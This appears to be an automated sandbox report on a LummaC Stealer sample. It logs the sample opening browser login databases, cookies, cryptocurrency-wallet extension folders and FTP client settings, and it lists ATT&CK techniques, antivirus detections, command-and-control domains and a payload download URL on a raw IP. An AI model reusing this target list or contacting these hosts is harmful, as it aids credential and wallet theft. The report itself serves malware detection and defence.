Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D1F3.tmp.exe PID: 7936, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: D1F3.tmp.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0069225C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_0069225C
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00691586 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00691586
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	2_2_004218BC
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	2_2_00420BE6

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	211 Process Injection	4 Obfuscated Files or Information	LSASS Memory	22 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	22 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	3 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fuk7RfLrD3.exe	41%	Virustotal		Browse
fuk7RfLrD3.exe	55%	ReversingLabs	Win32.Trojan.Generic
fuk7RfLrD3.exe	100%	Avira	HEUR/AGEN.1312582
fuk7RfLrD3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://skidjazzyric.click/apie	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DE1	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEd	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exec	0%	Avira URL Cloud	safe
https://skidjazzyric.click/api	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=	100%	Avira URL Cloud	malware
skidjazzyric.click	100%	Avira URL Cloud	malware
https://skidjazzyric.click/(	100%	Avira URL Cloud	malware
https://skidjazzyric.click/apirUQ(e/	100%	Avira URL Cloud	malware
http://crl.microX-z	0%	Avira URL Cloud	safe
https://skidjazzyric.click:443/apil	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exeU	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DE	100%	Avira URL Cloud	malware
https://skidjazzyric.click:443/api	100%	Avira URL Cloud	malware
http://176.113.115.19/0	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe:C7	0%	Avira URL Cloud	safe
https://post-to-me.com/track_prt.php?sub=0&cc=DEf-	100%	Avira URL Cloud	malware
https://post-to-me.com/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	172.67.179.207	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
skidjazzyric.click	104.21.80.1	true	false	high
time.windows.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
